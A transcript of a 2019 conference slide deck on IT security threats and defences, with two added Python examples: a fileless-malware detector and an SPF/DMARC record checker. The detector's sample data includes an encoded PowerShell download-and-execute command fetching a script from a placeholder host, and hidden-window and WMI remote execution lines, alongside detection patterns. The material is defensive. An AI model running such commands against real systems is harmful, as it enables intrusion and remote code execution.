
Fears and fulfillment with IT security

154 views

Published on

A talk given to the Minn. county IT conference in October 2019

Published in: Technology


  1. Fears and Fulfillment with Today’s IT security. David Strom, MnCCC annual security conference, Oct 2019
  2. Agenda
     • Current state of IT security
     • Typical multi-stage cyber infection chain:
       • Phishing probe
       • Ransomware and data theft
       • Lateral movement with fileless malware
     • Recommendations for improving your security posture
  4. A sample of breach detection delays
     • Yahoo (3B accounts, 2013): many years to detect and notify
     • Marriott (383M guests, 2014-18): 4 years to detect, 2 months to notify
     • Advent Health (42k customers, 2017-18): 16 months to detect, 18 months to notify
     • Uber (57M customers, 2016): 1 year to detect and notify
     • eBay (145M users, 2014): 7 months to detect and notify
     • Heartland Payments (134M accounts, 2008): 9 months to detect
  5. Let’s look at the telltale signs of a typical phishing attack
  6. Phishing awareness education is especially needed for these situations
     • Business working with a foreign supplier
     • Business receiving or initiating a wire transfer request
     • Business contacts receiving fraudulent correspondence
     • Executive and attorney impersonations
     • Confidential data theft
  7. Phishing prevention suggestions
     • Examine the tone and phrasing of the email
     • Have shared authority on money transfers
     • Understand the underlying social engineering ploy
     • Don’t get sucked in by a phony sense of urgency
     • Trust but verify: phone calls can be spoofed
  8. Spread and prevention of ransomware
  9. Don’t become Georgia!
     • City of Atlanta
     • State Department of Public Safety
     • State and local court systems
     • City hospitals
     • County governments
     • Small city police departments
  10. Behind the Texas local government August attacks
  11. The wrong things to focus on
     • Did the victim pay up?
     • What did it cost to restore data?
     • What data was deleted or lost?
     • How long were things out of commission?
  12. Six bad IT decisions exposed by ransomware
     • Sloppy infosec makes it hard to find the root cause
     • Inconsistent IT infrastructure ownership
     • Delayed patching and updates
     • Poor disaster recovery and backup procedures
     • Lousy staff communications and poor disruption planning
     • Mismatched asset value and protection policies
  13. Three general types of attacks:
     • Return-oriented programming
     • Scripting-based
     • Polymorphic
  14. Sample fileless malware campaigns
     • Target 2014 breach (flat network)
     • DNC 2016 hack (PowerShell and WMI entry)
     • August Stealer 2016 (Word macros and PowerShell)
     • 3ve group November 2018 (ad click fraud)
     • Netwire phishing campaign February 2019 (VBScript, Google Drive)
     • Astaroth campaign July 2019 (PowerShell)
     • Poison Ivy 2018 (Word macro, shown next slide)
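The campaigns listed on the slide above share tradecraft that endpoint telemetry can catch without any file on disk: an Office application spawning a script host, WMI used to create processes on other hosts, and PowerShell launched with hidden-window or encoded-command switches. The following is an added example, not part of the talk, that runs that detection logic in Python over constructed process-creation events. The event records, field names, host name and the `example.invalid` URL are all made up for the demonstration.

```python
import base64
import re

# Constructed process-creation events, shaped like simplified Sysmon/EDR
# "process create" records. Sample inputs only, not real telemetry.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
    .encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD},
    {"parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": 'wmic /node:ws42 process call create "powershell -w hidden"'},
    {"parent": "EXCEL.EXE", "image": "wscript.exe",
     "cmdline": "wscript.exe C:\\Users\\bob\\AppData\\Local\\Temp\\invoice.vbs"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell switches that hide the window, skip the profile, or pass an encoded script
STEALTH_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|enc(?:odedcommand)?\b)")
# Download-and-execute primitives that rarely belong in a command line
DOWNLOAD_EXEC = re.compile(r"(?i)downloadstring|invoke-expression|\bIEX\b|frombase64string")
ENCODED_ARG = re.compile(r"(?i)-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return the list of reasons this event resembles fileless-malware tradecraft."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmdline = event["cmdline"]
    reasons = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append("office-spawned-script-host")
    if image == "wmic.exe" and "process call create" in cmdline.lower():
        reasons.append("wmi-process-creation")
    if STEALTH_FLAGS.search(cmdline):
        reasons.append("stealth-powershell-flags")
    # Inspect the decoded script too: the raw command line hides the payload.
    decoded = decode_encoded_command(cmdline)
    if DOWNLOAD_EXEC.search(cmdline) or (decoded and DOWNLOAD_EXEC.search(decoded)):
        reasons.append("download-and-execute")
    return reasons


def triage(events):
    """Return [(index, reasons)] for every event that raised at least one reason."""
    findings = []
    for i, event in enumerate(events):
        reasons = analyze_event(event)
        if reasons:
            findings.append((i, reasons))
    return findings


if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["image"], ", ".join(reasons))
```

The benign administrative run in the first event (an unencoded script launched from Explorer) raises nothing, which is the point of scoring on parent/child relationships and decoded content rather than on "powershell.exe ran". In a real deployment the same rules would be expressed in the EDR or SIEM query language, but the decode step is the part most often missed.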
  15. Here are four practical tips to help protect your network
     • Apply patches quickly across all systems
     • Segment your network carefully
     • Restrict admin rights severely
     • Disable unneeded Windows apps and protocols (SMBv1!)
  16. Best practices for better security
     1. Have dedicated and trained breach response teams
     2. Limit and segment IoT devices on your network
     3. Use security automation tools whenever possible
     4. Find breaches and contain them quickly
     5. Vet your MSP security procedures
  17. Use these three email authentication protocols: SPF, DKIM, DMARC
  18. DMARC, SPF, and other email security tech
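SPF, DKIM and DMARC only protect a domain when the records are set to fail unauthenticated mail and when the identifier that authenticated aligns with the From: domain; a DMARC record with `p=none` or an SPF record ending in `+all` publishes the protocol without enforcing anything. The following added example (mine, not from the talk) parses constructed SPF and DMARC TXT records, grades the SPF final qualifier, and applies DMARC's relaxed/strict alignment rules to a message. The domains and records are invented; the organisational-domain rule is simplified to the last two labels (real validators consult the Public Suffix List); and DKIM signature verification itself is assumed to have already happened, so the function takes the `d=` domain that passed as an input.

```python
# Constructed DNS TXT answers (not real records), keyed by the queried name.
SAMPLE_TXT = {
    "example.test": ["v=spf1 ip4:192.0.2.0/24 include:_spf.mail.example.test ~all"],
    "_dmarc.example.test": [
        "v=DMARC1; p=reject; pct=100; adkim=s; aspf=r; rua=mailto:dmarc@example.test"],
    "weak.test": ["v=spf1 +all"],
    "_dmarc.weak.test": ["v=DMARC1; p=none"],
}

# What the SPF final qualifier does to senders the record does not list.
SPF_QUALIFIERS = {
    "-all": "fail (enforcing)",
    "~all": "softfail (monitoring only)",
    "?all": "neutral (no opinion)",
    "+all": "pass-all (authorises every sender)",
}


def spf_strength(record):
    """Grade an SPF record by its final 'all' mechanism."""
    if not record.lower().startswith("v=spf1"):
        return "not an SPF record"
    last = record.split()[-1].lower()
    return SPF_QUALIFIERS.get(last, "no 'all' mechanism (defaults to neutral)")


def parse_dmarc(record):
    """Split 'v=DMARC1; p=reject; ...' into a lowercase tag dictionary."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def org_domain(domain):
    # Simplified assumption: the organisational domain is the last two labels.
    return ".".join(domain.lower().split(".")[-2:])


def aligned(from_domain, auth_domain, mode):
    """DMARC identifier alignment: 's' requires an exact match, 'r' an org-domain match."""
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def dmarc_verdict(from_domain, spf_pass_domain, dkim_pass_domain, txt=SAMPLE_TXT):
    """Evaluate a message against the From: domain's DMARC policy.

    spf_pass_domain: the MAIL FROM domain whose SPF check passed, or None.
    dkim_pass_domain: the d= domain of a DKIM signature that verified, or None.
    """
    records = [r for r in txt.get("_dmarc." + from_domain.lower(), [])
               if r.upper().startswith("V=DMARC1")]
    if not records:
        return {"policy": None, "pass": None}  # no DMARC record: nothing to enforce
    tags = parse_dmarc(records[0])
    aspf = tags.get("aspf", "r")
    adkim = tags.get("adkim", "r")
    spf_ok = spf_pass_domain is not None and aligned(from_domain, spf_pass_domain, aspf)
    dkim_ok = dkim_pass_domain is not None and aligned(from_domain, dkim_pass_domain, adkim)
    return {
        "policy": tags.get("p", "none"),
        "spf_aligned": spf_ok,
        "dkim_aligned": dkim_ok,
        "pass": spf_ok or dkim_ok,  # DMARC passes if either identifier aligns
    }


if __name__ == "__main__":
    for name, records in SAMPLE_TXT.items():
        if not name.startswith("_dmarc."):
            print(name, "SPF:", spf_strength(records[0]))
    print(dmarc_verdict("example.test", "mail.example.test", None))
    print(dmarc_verdict("weak.test", "other.example", None))
```

Note the asymmetry the strict `adkim=s` setting creates: a DKIM signature from `mail.example.test` does not align with a From: of `example.test`, while the relaxed `aspf=r` lets SPF from the same subdomain count. That is a common source of unexpected rejects when a domain moves from `p=none` to `p=reject`.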
  19. Use MFA to protect ALL logins
  20. Questions, connections
     • My website:
     • Twitter: @dstrom
     • Email:
     • Slide copies can be found here: